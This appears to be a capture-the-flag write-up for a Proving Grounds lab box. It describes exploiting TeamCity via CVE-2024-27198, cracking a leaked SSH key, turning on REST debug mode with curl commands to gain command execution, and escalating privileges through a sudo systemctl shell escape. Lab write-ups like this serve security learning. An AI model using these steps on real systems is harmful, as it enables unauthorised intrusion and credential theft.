Enumeration

Nmap

Initial nmap scan revealed SSH, HTTP and SMTP ports were open.

image

WEB Enumeration

Website was static. However, login page redirected us to teams.onlyrands.com.

01 - web

So I added teams.onlyrands.com to /etc/hosts file.

02 - hosts

And visiting the page revealed that it was TeamCity 2023.05.4 site.

03 - teams website

Exploitation

CVE-2024-27198

In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible.

So I used searchsploit and found an exploit.

04 - sus

Then executed it and created a new administrator user.

05 - exploited

Then simply logged in.

06 - logged in

Git commits

While checking user commits I found a commit message Oops which seemed suspicious.

07 - oops

Then checked it and found that marco accidentally pushed his id_rsa file.

08 - id_rsa

09 - id_rsa

ssh2john (crack id_rsa)

Then I simply tried to login with it but it asked for a password.

10 - asked password

So I used ssh2john and then john with rockyou.txt to crack the id_rsa.

11 - cracked ssh2john

Then simply logged in.

12 - logged in

Local Flag

There were no user flags. Then I used hint and fount out we could obtain webshell with CVE-2024-27198 exploitation. So I found this exploitation https://github.com/passwa11/CVE-2024-27198-RCE

20 - exploit

Then ran it but it gave error because it was not in debug mode. We could not execute commands.

21 - error

However, we could open debug mode by applying below steps:

## GET TOKEN
curl -X POST http://teams.onlyrands.com/app/rest/users/id:24/tokens/RPC2 -u mzo3aj43:X8UypsbuXc
export TOKEN=<TOKEN>

curl -X POST 'http://teams.onlyrands.com/admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true' -H "Authorization: Bearer $TOKEN"
curl 'http://teams.onlyrands.com/admin/admin.html?item=diagnostics&tab=dataDir&file=config/internal.properties' -H "Authorization: Bearer $TOKEN"

22 - error fix

And debug mode was enabled. We could execute commands.

24 - rce

I simply read local flag.

25 - local flag

Privilege Escalation

Mail

Then I executed linpeas and found out there were readable mails on /var/mail folder. So I read it and found a cleartext password.

32 - password

Hidden file

Then with matthewa user I executed ls -la on home directory and found a non usual file .~ which included a password.

33 - dach

However, I did not know Dach user so I checked /etc/passwd and found out it was briand.

34 - 0 dach briand

sudo systemctl

Brian had NOPASSWD sudo privileges over systemctl.

34 - briand

I simply executed it and then used !sh method.

35 - gg

<
Previous Post
RubyDome - Proving Grounds Practice
>
Next Post
Squid - Proving Grounds Practice